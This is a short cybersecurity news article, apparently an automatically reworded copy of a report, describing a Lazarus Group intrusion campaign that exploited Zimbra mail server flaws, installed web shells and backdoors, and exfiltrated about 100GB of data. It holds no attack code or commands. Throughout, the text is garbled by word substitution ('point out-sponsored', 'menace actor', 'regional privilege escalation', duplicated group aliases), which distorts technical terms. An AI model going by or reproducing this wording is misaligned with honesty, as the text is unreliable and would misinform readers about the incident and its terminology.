A new intelligence gathering campaign connected to the prolific North Korean point out-sponsored Lazarus Team leveraged acknowledged security flaws in unpatched Zimbra equipment to compromise victim methods.
That is according to Finnish cybersecurity firm WithSecure (formerly F-Secure), which codenamed the incident No Pineapple.
Targets of the malicious procedure bundled a health care analysis firm in India, the chemical engineering department of a primary study university, as effectively as a company of technology employed in the energy, study, defense, and health care sectors, suggesting an try to breach the provide chain.
Around 100GB of data is believed to have been exported by the hacking crew next the compromise of an unnamed shopper, with the digital split-in most likely taking spot in the 3rd quarter of 2022.
“The menace actor received accessibility to the network by exploiting a vulnerable Zimbra mail server at the close of August,” WithSecure claimed in a thorough technical report shared with The Hacker News.
The security flaws made use of for original obtain are CVE-2022-27925 and CVE-2022-37042, both equally of which could be abused to get remote code execution on the underlying server.
This phase was succeeded by the installation of web shells and the exploitation of regional privilege escalation vulnerability in the Zimbra server (i.e., Pwnkit aka CVE-2021-4034), thus enabling the risk actor to harvest delicate mailbox details.
Subsequently, in October 2022, the adversary is explained to have carried out lateral motion, reconnaissance, and eventually deployed backdoors these kinds of as Dtrack and an up-to-date version of GREASE.
GREASE, which has been attributed as the handiwork of a different North Korea-affiliated danger cluster called Kimsuky, will come with capabilities to develop new administrator accounts with distant desktop protocol (RDP) privileges while also skirting firewall regulations.
Dtrack, on the other hand, has been utilized in cyber assaults aimed at a wide variety of business verticals, and also in economically inspired attacks involving the use of Maui ransomware.
“At the starting of November, Cobalt Strike [command-and-control] beacons had been detected from an interior server to two menace actor IP addresses,” scientists Sami Ruohonen and Stephen Robinson pointed out, incorporating the info exfiltration happened from November 5, 2022, as a result of November 11, 2022.
Also applied in the intrusion were equipment like Plink and 3Proxy to build a proxy on the victim method, echoing former results from Cisco Talos about Lazarus Group’s attacks targeting electricity suppliers.
North Korea-backed hacking groups have experienced a busy 2022, conducting the two espionage-pushed and cryptocurrency heists that align with the regime’s strategic priorities.
Most a short while ago, the BlueNoroff cluster, also recognized by the names APT38, Copernicium, Stardust Chollima, and Copernicium, and Stardust Chollima, and TA444, was related to vast-ranging credential harvesting attacks aimed at training, monetary, federal government, and healthcare sectors.
Identified this post exciting? Follow us on Twitter and LinkedIn to read far more exceptional content we submit.
Some parts of this post are sourced from: